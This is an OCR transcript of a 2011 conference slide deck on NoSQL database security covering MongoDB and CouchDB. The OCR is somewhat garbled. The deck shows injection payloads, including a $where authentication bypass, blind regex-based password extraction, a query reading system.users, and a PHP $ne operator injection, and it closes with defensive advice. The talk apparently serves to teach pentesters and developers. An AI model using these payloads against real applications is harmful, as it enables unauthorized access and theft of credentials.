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Security Consultant working for Securus 
Global in Melbourne 

Did/Is doing a lot a web pentesting 



Research focus on web security: 

- Web Attacks 

- Web Application Scanners (WAS) testing 

- Web Application Firewall (WAF) testing 

- (In)Secure coding 



***f 




© Securus Global 2011 




s^& 



NoSQL databases? 



"New" trend in web application but mostly based 
on an old idea from 1998 



Is being more and more used for data storage 
Goal: 

- Avoiding predefined structure (in comparison to 
relational databases) 

- Supposed to scale more easily 
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NoSQL databases? 

No predefined query languages like SQL: 

-All NoSQL databases have their own language... 

- All NoSQL databases have their own access 
method... 

Most of the time, a driver is used between the 
database and the web application 
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NoSQL databases? 



▼ mongoDB 



hi amazon 

web services 





CouchDB 
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MongoDB 

Homepage: http://www.mongodb.org/ 



Known companies using it: 

- ElKJKcuHjorkffimcs for submission form 

- €> Springer for artic | e storage 

science+business media 

- sourceHjUJE for page storage 

- a lot of web startups (the cool kids) 
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MongoDB 



Written in C++ 



Direct TCP Connection (TCP/27017) 

Listen on all interfaces by default 

Client side JavaScript shell (full JavaScript 
support using SoiderMonkey from Mozilla) 
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MongoDB: authentication 

Users' passwords are hashed using MD5 
based function: 



hex_md5 ( username + ":mongo:" + pass ) 



Authentication: 

- Based on challenge/response 

-Turn off by default: "trusted environment" 

- Can't use authentication in a cluster 
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MongoDB: authorisation and 

encryption 

Two levels of privileges: 

• Admin access: full access to all databases 

• User access: per database and possibility of 
readonly access 

No "per table" authorisation 



No database encryption 
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MongoDB: queries examples 

> db . system . users . find ( ) ; 

{ "_id" : Objectld("4d6f2clef692ecflal7d2c07") , 
"user" : "admin", 

"pwd" : "7c67efl3bbd4cael06d959320af3f704" } 
{ "_id" : ObjectId("4d6f2d9ce9ddll8723157c27") , 
"user" : "admin2", 
"pwd" : "271b850db86d3b06ac910a4alc785254" } 



> db.getCollection ( "system. users" ).find(); 

{ "_id" : Objectld("4d6f2clef692ecflal7d2c07") , 
"user" : "admin", 
"pwd" : "7c67efl3bbd4cael06d959320af3f704" } 




w mongoDB 



MongoDB: queries examples 

> db. system. users. find ({user: "admin" }) ; 

{ "_id" : Objectld("4d6f2clef692ecflal7d2c07") , 
"user" : "admin", 
"pwd" : "7c67efl3bbd4cael06d959320af3f704" } 

> db . system . users . find ( ) . sort ( { name : 1 } ) . limit ( 1 ) ; 

{ "_id" : Objectld("4d6f2clef692ecflal7d2c07") , 
"user" : "admin", 
"pwd" : "7c67efl3bbd4cael06d959320af3f704" } 



> db . system . users . find ( ) . count ( ) ; 

2 
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MongoDB: queries examples 

> db. system. users. find ( 
{ $or : [ { user : ' admin ' } , 
{ user : "admin2"} ] } ) ; 

{ "_id" : Objectld("4d6f2clef692ecflal7d2c07") , 
"user" : "admin", 
"pwd" : "7c67efl3bbd4cael06d959320af3f704" } 



> db. system. users . find ( { $where: 
"this .user==' admin' || 
this. user == 'admin2'" } ) ; 

{ "_id" : Objectld("4d6f2clef692ecflal7d2c07") , 
"user" : "admin", 
"pwd" : "7c67efl3bbd4cael06d959320af3f704" } 

Sbcuius 
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No SQL ... No injections 



I read a lot of web pages speaking about 
the fact the with NoSQL there won't be any 

SQL injections ... 

True BUT... 
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MongoDB: NoSQL injections 

• Previous example in authentication: 

- Ruby based (input in red): 

User. all ( '$where' => 

"this . username=- # {params [ : username] } ' && 
this . password== ' # {md5 (params [ : password] ) } ' " ) 

- If the username and password provided 
match a record... you're in !!! 
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MongoDB: NoSQL injections 

But what happens if you submit the 



following username: admin' \\ i==i // 



• The condition is always true and the end 
of the request is commented out: 

User. all (' $where ' => 

"this . username==' admin' || 1 ==1 // 

") 
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MongoDB: NoSQL injections 



Retrieving information using union like 
syntax and retrieve information in the 

same page... 

... not possible so far and for the current 
version since no Union keyword exists 
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MongoDB: Blind NoSQL 
injections 

Based on 2 states: true or false 

Using '&&' (logic AND) to generate these 2 
states 

Retrieving information: 



User . all ( ' $where ' => 

"this . username==' Admin ' 

&& this. password. match (/ A A.*/) ")// ") 
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MongoDB: Blind NoSQL 
injections 

Admin' && this .password. match (/ A A. */) ")// 

Admin' && this .password. match (/ A B. */) ")// 

Admin' && this .password. match (/ A BA. */) ")// 

Admin' && this .password. match (/ A BB. */) ")// 

Admin' && this .password. match (/ A BBA. */) ")// 
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MongoDB: Blind NoSQL 
injections 

Retrieving information from other tables 
(example with system. users): 



Admin 1 && 

db . getCollect ion ( ' system . users ' ) . f indOne ( { 

$where: 'this. user == "admin" '}) " }); // 
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MongoDB: Blind NoSQL 
injections... problems 

No meta-tables with all information on 
tables since NoSQL databases are meant 
to be schema-less.. 

- You need to brute force the attributes' 
names using dictionaries 

- Hopefully most frameworks (like Rails) do 
a direct mapping between HTTP 
parameters and objects/attributes ;) 
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MongoDB: Blind NoSQL 
injections... problems 

All records don't necessarily have the 
same attributes: 

- For example a user can have a password 
attribute and another one won't 



Admin' && this .password 

&& this .password. match (/ A AU. */) // 



String comparisons are case-sensitive 
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MongoDB: Blind NoSQL 
injections... extra point 



Found a DOS in SpiderMonkey during 

testing :) ... 
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MongoDB: NoSQL injections in 

PHP 

• Access to /index. php?user=admin 

$collection->find (array ("user" => ^ admin' ) ) ; 

• Access to /index. php?user[$ne]=admin 

$collection->f ind (array ( "user" => 
array ( ' $ne ' => " admin" ) ) ) ; 

-That will return all users not named admin 
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MongoDB: Avoiding injections 

Keep the good old recipes: 



nput validat 
nput validat 
nput validat 
nput validat 
nput validat 
nput validat 
nput validat 



ons/encoding/escaping 
ons/encoding/escaping 
ons/encoding/escaping 
ons/encoding/escaping 
ons/encoding/escaping 
ons/encoding/escaping 
ons/encoding/escaping 
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CouchDB 



Homepage: http:/y 
-Apache project 



Known companies using it: 
- Mostly startups J. 

-Credit Suisse internally 
-BBC 
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CouchDB 



Written in Erlang 



HTTP based communication (REST + 
JSON) ... No SSL:/ 



Only listen on 127.0.0.1 
by default 
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CouchDB: authentication 



By default, CouchDB starts in "Admin 
party" mode: 

-Anyone can modify/delete everything 
- No authentication 



If passwords are used: 
- SHA1 (password+salt) 
-128-bits UUID salt 
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CouchDB: authorisation 



Possibility to write functions to validate any 
requests received: 

-Access to current user and current 
database (user's context) 

-Validations need to be 

written in JavaScript 
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CouchDB 

• Server's header for fingerprint/Shodan: 

Server: CouchDB/0 . 10 . (Erlang OTP/R13B) 



Admin interface (Futon): 





© Securus Global 2011 



CouchDB 



CouchDB: Security issues 

Cross Site Scripting (CVE-201 0-3854) in 
Futon 



Issue in string comparison and timing 
attack in authentication 

(CVE-201 0-0009) 
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Other traditional 
recommendations 

You can copy/paste security recommendations 
from the SQL world but since I don't usually 
see it ... 

Firewall ... 

Passwords... 

Least privileges w£**** 

No direct access/3-tier architecture "^^^^ 
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Other traditional 
recommendations 

Security updates 
Follow devs' mailing list 
Apply patches (ALL PATCHES) 

Input validation and encoding 
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Conclusion 

New trend... all the cool kids are using it. 

Nothing really new regarding security 
(builders' side): 

- Firewall/Least privileges/Passwords/... 



More fun for pentesters with something new t 
understand/work on (breakers' side) v 



new to 
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